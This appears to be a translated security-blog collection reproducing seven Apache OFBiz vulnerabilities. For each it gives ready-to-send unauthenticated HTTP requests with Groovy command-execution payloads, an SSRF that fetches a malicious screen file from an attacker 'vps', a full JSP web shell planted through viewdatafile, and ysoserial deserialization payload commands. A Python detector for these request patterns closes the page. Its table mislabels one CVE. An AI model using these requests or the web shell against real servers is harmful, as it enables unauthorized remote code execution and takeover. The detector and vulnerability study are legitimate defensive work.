Apache OFBiz Historical Vulnerability Reproduction Collection.pdf

admin, 2024-10-31 10:15:58

Author: Timeline Sec Vulnerability Research Group
Disclaimer: for study and reference only. Do not use for illegal purposes; otherwise you bear the consequences yourself.

No.  CVE ID          Type             Author
1    CVE-2024-45507  SSRF&RCE         七安
2    CVE-2024-45195  RCE              七安
3    CVE-2024-38856  RCE              七安
4    CVE-2024-32113  RCE              七安
5    CVE-2024-36104  RCE              七安
6    CVE-2023-51467  Deserialization  七安
7    CVE-2020-9496   Deserialization  七安


Apache OFBiz SSRF & RCE Vulnerability (CVE-2024-45507)

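0x01 Exploitation Conditions

Privileges required: none
Other conditions: remote access allowed

0x02 Affected Versions

<= 18.12.16

0x03 Reproduction

First, visit https://ip:8443/accounting and wait for the page to load. Once it has loaded, the login page is displayed.

Because this is an SSRF vulnerability, an HTTP server is needed to receive the request. Start one with Python:

python3 -m http.server 8899

SSRF vulnerability
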
POST /webtools/control/forgotPassword/StatsSinceStart HTTP/1.1
Host: host
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

statsDecoratorLocation=http://vps:port/path

The request is then visible on the HTTP server.

Code execution

First, create a malicious XML file with the following content:

<?xml version="1.0" encoding="UTF-8"?>
<screens xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xmlns="http://ofbiz.apache.org/Widget-Screen" xsi:schemaLocation="http://ofbiz.apache.org/Widget-Screen http://ofbiz.apache.org/dtds/widget-screen.xsd">

    <screen name="StatsDecorator">
        <section>
            <actions>
                <set value="${groovy:'touch /tmp/success'.execute();}"/>
            </actions>
        </section>
    </screen>
</screens>

Start the HTTP service and construct the request packet.

Check whether the file success exists in the /tmp directory on the OFBiz server. If the file exists, the command was executed successfully.

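Apache OFBiz Authentication Bypass Leading to Remote Code Execution (CVE-2024-45195)

0x01 Exploitation Conditions

Privileges required: none
Other conditions: remote access allowed

0x02 Affected Versions

<= 18.12.16

0x03 Reproduction

First, visit https://ip:8443/accounting and wait for the page to load. Once it has loaded, the login page is displayed.

Next, create a malicious XML file and a CSV file on the server. The XML file is named rceschema.xml and has the following content: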

<data-files xsi:noNamespaceSchemaLocation="http://ofbiz.apache.org/dtds/datafiles.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
    <data-file name="rce" separator-style="fixed-length" type-code="text" start-line="0" encoding-type="UTF-8">
        <record name="rceentry" limit="many">
            <field name="jsp" type="String" length="605" position="0"></field>
        </record>
    </data-file>
</data-files>

The CSV file is named rcereport.csv and has the following content:

<%@ page import='java.io.*' %><%@ page import='java.util.*' %><h1>Ahoy!</h1><br><% String getcmd = request.getParameter("cmd"); if (getcmd != null) { out.println("Command: " + getcmd + "<br>"); String cmd1 = "/bin/sh"; String cmd2 = "-c"; String cmd3 = getcmd; String[] cmd = new String[3]; cmd[0] = cmd1; cmd[1] = cmd2; cmd[2] = cmd3; Process p = Runtime.getRuntime().exec(cmd); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine();}} %>,

Note that the length of the content in the CSV file must match the value of length in the XML file. After creating both files, start the HTTP service.

Construct the request:

POST /webtools/control/forgotPassword/viewdatafile HTTP/1.1
Host: host
User-Agent: curl/7.81.0
Accept: */*
Content-Length: 249
Content-Type: application/x-www-form-urlencoded

DATAFILE_LOCATION=http://vps:8899/rcereport.csv&DATAFILE_SAVE=./applications/accounting/webapp/accounting/index.jsp&DATAFILE_IS_URL=true&DEFINITION_LOCATION=http://vps:8899/rceschema.xml&DEFINITION_IS_URL=true&DEFINITION_NAME=rce

Check that the HTTP server has received two requests.

After the two requests have been received, visit http://ip:8443/accounting/index.jsp?cmd=id to execute arbitrary commands.

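Apache OFBiz Authentication Bypass Leading to Remote Code Execution (CVE-2024-38856)

0x01 Exploitation Conditions

Privileges required: none
Other conditions: remote access allowed

0x02 Affected Versions

18.12.11

0x03 Reproduction

First, visit https://ip:8443/accounting and wait for the page to load. Once it has loaded, the login page is displayed.

Construct the request:
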
POST /webtools/control/main/ProgramExport HTTP/1.1
Host: host
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDbR7sY3IIwQX7kcJ
Content-Length: 188

------WebKitFormBoundaryDbR7sY3IIwQX7kcJ
Content-Disposition: form-data; name="groovyProgram"

throw new Exception('id'.\u0065xecute().text);
------WebKitFormBoundaryDbR7sY3IIwQX7kcJ--

If the request succeeds, the execution result is shown in the response.

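Apache OFBiz Directory Traversal Leading to Command Execution (CVE-2024-32113)

0x01 Exploitation Conditions

Privileges required: none
Other conditions: remote access allowed

0x02 Affected Versions

< 18.12.13

0x03 Reproduction

First, visit https://ip:8443/accounting and wait for the page to load. Once it has loaded, the login page is displayed.

Construct the following request:
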
POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.35
Connection: close
Content-Length: 55
Content-Type: application/x-www-form-urlencoded
user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

groovyProgram=throw+new+Exception('id'.execute().text);

After the request succeeds, the result of the command execution can be seen in the response.

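Apache OFBiz Directory Traversal Leading to Command Execution (CVE-2024-36104)

0x01 Exploitation Conditions

Privileges required: none
Other conditions: remote access allowed

0x02 Affected Versions

< 18.12.14

0x03 Reproduction

First, visit https://ip:8443/accounting and wait for the page to load. Once it has loaded, the login page is displayed.

Construct the following request:
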
POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.35
Connection: close
Content-Length: 260
Content-Type: application/x-www-form-urlencoded
user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b

After the request succeeds, the result of the command execution can be seen in the response.

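Apache OFBiz Authentication Bypass Leading to Command Execution (CVE-2023-51467)

0x01 Exploitation Conditions

Privileges required: none
Other conditions: remote access allowed

0x02 Affected Versions

18.12.10

0x03 Reproduction

First, visit https://ip:8443/accounting and wait for the page to load. Once it has loaded, the login page is displayed.

Construct the following request:
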
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: host:8443
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

After the request succeeds, the result of the command execution can be seen in the response.

Apache OFBiz Deserialization Command Execution Vulnerability (CVE-2023-49070)

0x01 Exploitation Conditions

Privileges required: none
Other conditions: remote access allowed

0x02 Affected Versions

<=18.12.09

0x03 Reproduction

First, visit https://ip:8443/accounting and wait for the page to load. Once it has loaded, the login page is displayed.

Use the CommonsBeanutils1 gadget from ysoserial to generate the payload:

java -jar ysoserial-all.jar CommonsBeanutils1 "touch /tmp/success" | base64 | tr -d "\n"

Use the generated payload to construct the following request:

POST /webtools/control/xmlrpc;/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: host
Content-Type: application/xml
Content-Length: 4133

<?xml version="1.0"?>
<methodCall>
  <methodName>ProjectDiscovery</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[Base64 payload generated with the ysoserial command above]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Then log in to the server and check whether the success file has been created.

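Apache OFBiz Deserialization Command Execution Vulnerability (CVE-2020-9496)

0x01 Exploitation Conditions

Privileges required: none
Other conditions: remote access allowed

0x02 Affected Versions

17.12.03

0x03 Reproduction

First, visit https://ip:8443/accounting and wait for the page to load. Once it has loaded, the login page is displayed.

Use the CommonsBeanutils1 gadget from ysoserial to generate the payload:

java -jar ysoserial-all.jar CommonsBeanutils1 "touch /tmp/success" | base64 | tr -d "\n"

Use the generated payload to construct the following request:
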
POST /webtools/control/xmlrpc HTTP/1.1
Host: 192.168.0.163:8443
Content-Type: application/xml
Content-Length: 4133

<?xml version="1.0"?>
<methodCall>
  <methodName>ProjectDiscovery</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[Base64 payload generated with the ysoserial command above]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Then log in to the server and check whether the success file has been created.

The command was executed successfully.
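
A defender-side check for the request shapes shown in the sections above, as an added example that is not part of the original article: it normalises the request path and body, then reports which of this page's patterns a logged request matches. The function names, finding labels and sample requests are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, unquote_plus, urlsplit

VIEWS = {"programexport", "viewdatafile", "statssincestart"}  # from this page
UNICODE_ESC = re.compile(r"\\u([0-9a-fA-F]{4})")

def normalize(path):
    """Percent-decode, drop ';' path parameters, resolve '.' and '..' segments."""
    out = []
    for seg in unquote(path).split("/"):
        seg = seg.split(";", 1)[0].lower()
        if seg == "..":
            out[-1:] = []
        elif seg not in ("", "."):
            out.append(seg)
    return out

def findings(target, body=""):
    """Return why a request matches this page's patterns (body is unescaped first)."""
    url = urlsplit(target)
    segs = normalize(url.path)
    after = segs[segs.index("control") + 1:] if "control" in segs else []
    query = parse_qs(url.query, keep_blank_values=True)
    text = UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), unquote_plus(body))
    hits = []
    if len(after) > 1 and after[-1] in VIEWS:
        hits.append("extra-view-segment")      # e.g. forgotPassword/ProgramExport
    if ";" in url.path or "%2e" in url.path.lower():
        hits.append("path-confusion")          # ';' parameter or encoded dot
    if (query.get("requirePasswordChange") == ["Y"]
            and query.get("USERNAME") == [""] and query.get("PASSWORD") == [""]):
        hits.append("empty-credentials")
    if "groovyprogram" in text.lower() and ".execute(" in text:
        hits.append("groovy-exec")
    if after[:1] == ["xmlrpc"] and "<serializable" in body:
        hits.append("xmlrpc-serializable")
    return hits

# Constructed sample requests (targets from this page, bodies shortened).
SAMPLES = [
    ("/webtools/control/forgotPassword/%2e/%2e/ProgramExport",
     r"groovyProgram=x.\u0065xecute()"),
    ("/webtools/control/xmlrpc;/?USERNAME=&PASSWORD=&requirePasswordChange=Y",
     "<serializable>AAAA</serializable>"),
    ("/webtools/control/main", ""),
]

if __name__ == "__main__":
    for target, body in SAMPLES:
        print(findings(target, body), target)
```

Matching on the normalised path and the unescaped body means the `;`, `%2e` and `\uXXXX` variants above are caught by the same rule as the plain requests.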

Originally published on the WeChat official account Timeline Sec: Apache OFBiz Historical Vulnerability Reproduction Collection.pdf
